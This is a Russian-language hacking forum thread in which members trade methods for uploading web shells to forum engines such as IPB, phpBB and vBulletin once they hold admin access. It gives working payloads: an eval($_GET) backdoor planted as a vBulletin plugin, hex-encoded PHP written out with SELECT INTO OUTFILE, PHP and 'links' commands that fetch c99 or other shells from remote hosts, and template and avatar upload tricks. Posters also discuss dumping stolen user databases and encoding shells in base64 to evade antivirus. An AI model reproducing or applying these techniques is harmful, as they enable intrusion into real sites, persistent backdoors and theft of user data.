Заливка шелла в Форуме
Решил собрать все вместе, да бы уменьшить бояновые темы в разделе. Все вопросы, касающиеся заливки шелла в Форуме, задаем сюда. Приветствуется помощь в наполнении темы актуальным материалом.

He11.net Forums 1 (http://forum.antichat.ru/showpost.php?p=347007&postcount=12)
Ikonboard 1 (http://forum.antichat.ru/showpost.php?p=280115&postcount=4),2 (http://forum.antichat.ru/showpost.php?p=422079&postcount=5)
IPB 1 (http://someshit.net/showthread.php?t=141),2 (http://forum.antichat.ru/thread11551-%F8%E5%EB%EB.html)
Pehota Forum 1 (http://forum.antichat.ru/showpost.php?p=473947&postcount=24)
PHPbb 1 (http://someshit.net/showthread.php?t=179),2 (http://video.antichat.ru/file160.html),3 (http://forum.antichat.ru/showpost.php?p=198446&postcount=3),4 (https://forum.antichat.ru/showpost.php?p=1176333&postcount=36)
SMDS Forum 1 (http://forum.antichat.ru/showpost.php?p=387492&postcount=20)
SMF 1 (http://forum.antichat.ru/thread43633.html)
SowiBB 1 (http://forum.antichat.ru/showpost.php?p=408126&postcount=21)
vBulletin 1 (http://someshit.net/showthread.php?t=115),2 (http://video.antichat.ru/file221.html)
VumFOrum 1 (http://forum.antichat.ru/showpost.php?p=385752&postcount=19)
WR 1 (http://forum.antichat.ru/showpost.php?p=380128&postcount=18)

© ZAMUT
----------------------------------------------------------------------
Имею полную админку в IPB 1.3, шел через смайлы не катит - ибо там стоят права на запись.. единственная папка с 777 - это uploads, так вот.. моя цель - это залить шелл в эту папку.. действия таковы.
Создаю базу..
Заливаю код
INSERT INTO `shell` bla bla..
и выдираю его в файл
SELECT ("код шела") INTO OUTFILE '/var/www/forum/uploads/counter.php';

Загвозка, в том.. что в код вставляются слешы.. из-за них не работает шел.. я уже даж делал c LINE терминатеж бай.. вообщем, не знаю, как избавится от слешей в коде. Ввиду сегодняшнего гуглежа узнал, что они находятся на уровне php.ini. Прошу помощи в составлении запроса.


added@ на запросы внимания не обращайте.. писал машинально.

Есть доступ в админку
Не могу залить шелл... пробывал через файлы... рарешил загрузку пхп, заливается но при этом он качается... есть такая функция "Потерянные вложения" не отправлял сообщение... но там ничего нет... получается сейчас на сайте уже есть шеллы нужно только узнать ссылку... была идея узнать через базу... но в ней походу нет управления с БД %)

есть конфиг... но у них phpmyadmin стоит корява.. %)
п.с. сервак на винде

Как залить шелл на vBulletin 3.6.8?
Есть полные права админа.

вообщем такая проблема у меня есть доступ к админке на IPB 2.3.5 я хочу загрузить на сайт шелл я сделал все по примеру с phtml но он открывается как текст
тогда я попробовал операцию с копированием через выполнение пхп кода
copy('T:/home/virtual/forums.xx.ru/uploads/av-4.phtml','T:/home/virtual/forums.xx.ru/uploads/av.php');
но серв 0 реакции на это подскажите в чем может быть проблема
php 5.1.6
topserver низнаю какой версии =)
Apache 2.0 Handler

Попробуй подменить путь заливки авов вместо av на cache Например....и так же лей шелл через phtml///..а пхп код не выполняет наверное потому что у тебя нету прав роот админа...а просто простой админ...

Попробуй подменить путь заливки авов вместо av на cache Например....и так же лей шелл через phtml///..а пхп код не выполняет наверное потому что у тебя нету прав роот админа...а просто простой админ...
всё равно как текст ( есть еще какиенибудь варианты ?

Если нет прав роот админа то никак ..насколько я знаю..там нИ код выполнить..нИ SQL запросы из админки..

вообщем такая проблема у меня есть доступ к админке на IPB 2.3.5 я хочу загрузить на сайт шелл я сделал все по примеру с phtml но он открывается как текст
тогда я попробовал операцию с копированием через выполнение пхп кода
copy('T:/home/virtual/forums.globallive.ru/uploads/av-4.phtml','T:/home/virtual/forums.globallive.ru/uploads/av.php');
но серв 0 реакции на это подскажите в чем может быть проблема
php 5.1.6
topserver низнаю какой версии =)
Apache 2.0 Handler
проще через шаблон
заливаешь скин, далее картинки с шеллом в скин, удаляешь скин... картинки с шеллами остаются...
если нужно скину такой скин

проще через шаблон
заливаешь скин, далее картинки с шеллом в скин, удаляешь скин... картинки с шеллами остаются...
если нужно скину такой скин
cкинь в личку пожалуйста :) а еще лучше обьясни как самому в в хмл с картинками шел добавить :rolleyes:

cкинь в личку пожалуйста :) а еще лучше обьясни как самому в в хмл с картинками шел добавить :rolleyes:
В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.

Шелл будет доступен в директории
http://site/style_images/ip.boardpr1228455805/folder_js_skin/js_skin.php

Если нет скина IP.Board Pro
делаем так:
Импорт и экспорт стилей - Импорт... - Импорт шаблонов стиля
1. Импорт шаблонов стиля
выбираем ipb_skin-ip.boardpr.xml.gz (Какую директорию с изображениями использовать в этом стиле? - Никакую)
Залили.. далее
2. Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? - там будет что-то типо IP.Board Pro)
импортировали...
опять таки заходим в настройки скина, смотрим адресс директории
http://site/style_images/ip.boardpr/folder_js_skin/js_skin.php
и не забудьте его удалить, шаблоны удалятся, а картинки нет =)


Объясняю как сделать скин с шеллами
1. Ставим себе форум.
2. Закидываем в папку forum/style_images/нужный вам скин шеллы куда вам нужно.
3. Заходим в админку форума Внешний Вид - Импорт и экспорт стилей - Экспорт...
Какой стиль экспортировать? - выбираем какой нужен
Экспорт изображений
Какие изображения экспортировать? - выбираем папку с шеллами.

http://upload.com.ua/get/900580228 - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал

зы когда заливаете шелу лучше кодируйти их в base64 дабы они не полились веб антивирусами... :)

Залез в админку буржуйского форума phpBB3 около миллиона юзеров. Хотел слить базу. Вроде все в порядке но в админке ставлю сжатие gz неканает качает несжатым. И еще трабла качает примерно 70 мегов и обрубает скачку а это примерно 130к ползователей. Причем обрубает с точностью до байта 3 раза пытался. Дамп на сервере не сохраняет видимо прав на папку нет. Есть ли возможность в последней версии phpBB3 залить шелл? Востановление базы я так понял работает только из файлов на сервере. Загрузка аватаров есть.

Сорри незаметил тему перенесите плиз.

2 schut123

Правил картинку вставлял в нее код.
Сделать можно сохранив картинку в фотошопе и открыв hiew найти мето где написанно "Photoshop ....." менял на php код. Если перед этим открыть в паинте и сохранить место сдвинется ближе к начату файла что лучше.
Загружал картинку на сервер через админку способов я помню там полно.
Потом в админке форума создавал новую задачу прописывал путь к картинке и жал выполнить.

Картинка jpg

В конфигурации можно изменить пути к директории на чтото типа ../../../../../tmp чтобы не париться с путями

Код шелла можно и без кавычек делать - например простенький -
<?php eval($_GET[5]); ?>

можно без кавычек как сказали выше можно через функцию char(), можно в HEX-формате

может кто нибудь поподробнее объяснит как залить шелл в phpbb 3.0.3

Имеется
Русский Модифицированный IPB v1.3 Final © 2003 BesTFileZ.Net & IBR Team
Аккуант гл.админа. Как залить шелл?

учимся искать: https://forum.antichat.ru/thread76949.html

не заливается через смайлы пробывал уже...и через аватары пробывал.и через бд нельзя так как нет у юзера mysql прав на запись файлов.

Подскажите пожалуйста где раздобыть актуальный шел? Искал шел от rst, но на все что я находил - ругается антивирь. :(

шел от madnet
http://madnet.name/files/1/10.html

Шелы не могут быть не актуальными. r57 юзай, ибо cyber shell

Это моё мнение

как залить шел на сервер если там стоит TB Dev SZ Edition ...... есть пасс от админки........

кто-нибудь заливал шел в 3.0.х ?
восстановление базы только из файлов на сервере (%

Имею доступ к админке phpBB 2.0.23 (обычный двиг без всяких модов), как можно залить шел, связь если чё 302-809 ;) выручайте друзья!

Народ у меня такая ПРОБЛЕМА (http://metallkonsk.narod.ru/2009-02-09_125543.jpg) с r57shell, я так понимаю мне нужен компилятор, пробовал устанавливать Денвер но не помогло, кто что посаветует?

cкорее не компилятор, а интерпретатор
денвер должен был помочь, т.к. в него php включен
ну попробуй поставить xampp или wampserver

RazyKK Замени пробел . Всё индивидуально, но попробуй например так:
ls$IFS-la

RazyKK попробуй по одному ввести, тоесть сначала which lynx потом which wget и т.д.

Заливка links
links -source "http://откуда/shell.php" > /папка/куда/shell.php

Есть доступ в админку phpBB3 .

существует ли способ залить шелл???
если да, то какой?

Есть доступ в админку phpBB3 .

существует ли способ залить шелл???
если да, то какой?

1) Вкладка общие --> Безопасность
Разрешить php в шаблонах: Да
2)Вкладка Стили --> Компоненты стилей ->> Шаблоны
С помощью встроенного редактора шаблонов выбираем файл и пишем в него:
Код:

<!-- PHP --> phpinfo(); <!-- ENDPHP -->


Далее применяем шаблон, идем на измененную страницу и видим наш php код

Этот способ описал DeepXhadow за что ему +

имея информацию настроек и тд, что можно с ней делать?

Пытаюсь залить шелл на phpbb 2.0.21. Делаю апдейт бд через админку такого рода:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;

phpinfo() выводит без проблем, а так же любую команду через eval или passthru, но только состоящую из одного слова, так как не принимает кавычки. Тоесть, passthru(ls) работает, а passthru(ls -la) уже естествено нет. Пробовал обойти эту херню всякими бэк-слэшами, не помогает...

Может кто знает как это можно обойти? Может через char() или hex как это делается в мускл?

// Все нашол!

Как в XMB из админки залить?

Подскажите, залил шелл в phpBB 2й версии, вообщем лазаю там, хотел отредить индекс, а оказалось что там стоит тип на всех файлах только для чтения видать, ибо нечего не могу отредить :/, вопрос, можно ли это как нить убрать? шелл с57

установить права доступа

как именно? ) если можно то по конкретнее )

В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.

Шелл будет доступен в директории
http://site/style_images/ip.boardpr1228455805/folder_js_skin/js_skin.php

http://upload.com.ua/get/900580228 - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал

работает отлично, спасибо =) ipb 2.3.4

Подскажите как залить шелл в пхп2 ? доступ в админку есть, проблема в том что не моуг узнать полный путь к папке форума поэтому 1й пост не какит, узнать не могу ибо почему то профили вообще не работают -_-

eR']Подскажите как залить шелл в пхп2 ? доступ в админку есть, проблема в том что не моуг узнать полный путь к папке форума поэтому 1й пост не какит, узнать не могу ибо почему то профили вообще не работают -_-
узнать путь не особая проблема:
1. поюзай гугл inurl:site.com "error"
2. просканируй сайт на дириктории (часто бывают случаи что открыты дирриктории в которых лежат php скрипты, которые при примом открытии выдают ошибку синтаксическу ну и раскрытие)
3. потыкай скрипты что кроме форумного движка стоят (если есть)
4. реверс айпи, тыкаешь другие сайты на поиск раскрытия путей (часто случается что путь выглядет /usr/home/domain.com/htdocs/; /usr/home/domain2.com/htdocs/)
включи мозги

Как залить шелл в vBulletin 3.8.1? Линки в первом посту нерабочие.

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);


потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete

в булке 3.5.1 у меня нет прав на модули и редактирование прав. ПОдскажите можно ли канибудь через стили залить или другое.

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);


потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete
А как лить шелл ? дайте приблизительную команду у меня phpinfo видит на остальные команды даже внимание обращать не хочет ((((

Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.

А как лить шелл ? дайте приблизительную команду у меня phpinfo видит на остальные команды даже внимание обращать не хочет ((((

мб винда? а ты пишешь комманды никса... попробуй весь код шелла вписать вместо eval`a , но без <? ?> потом уже загрузить шелл в какуе-то папку (которая доступна для записи)

Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.

можно так попробовать:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

Тестилось на IBP 3.0.1 nulled

шелл: http://site.ru/uploads/shell.php

PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - image/gif->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

http://site.ru/index.php?app=core&module=usercp&tab=members&area=avatar

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

http://site.ru/uploads/av-1.php3

Просто возьми готовый шел: http://autospanner.ru/menu/groovie.rar

Подскажите как залить шелл через админку FUDforum 2.7.6 :confused:

Здесь (http://forum.antichat.ru/thread58383.html) не густо :(

Есть IP.Board 2.3.6 , через шаблоны шелл залить не получается так как закрыты все папки для записи. Есть также все админы в том числе и самый первый. раньше с помощью него в настройках исполнял команду
$data=implode('',file('http://ssilka/do/shella/c99.txt'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);

Нормально было шел заливался. Но сейчас так не делается и шела нету. В чем может быть проблема, как её обойти, и какие ещё могут быть способы?
Заранее спс

есть способы заливки шелла для форума vBulletin 3.8.0 Beta 3 ?!

в smf можно сменить директорию в которую заливаются темы ? :(

как залить шелл на TorrentPier ??

Кто знает еще какие то способы заливки шелла на ipb 2.3.4 ? Через импорт изображения - не проходит - вернее шелл загружен но видимо в директории запрещено выполнение скриптов, вываливается ошибка 500 Internal Server Error, через аватару тоже не проходит - и тип файла добавил и разрешение в аватаре на этот тип добавил, но все равно не загружает.
Заранее спасибо

такой вопрос, залил шелл на IPB NULL, пытаюсь войти и выдаёт 500 Internal Server Error. В чем может быть проблема? Точнее как залить шелл не через стили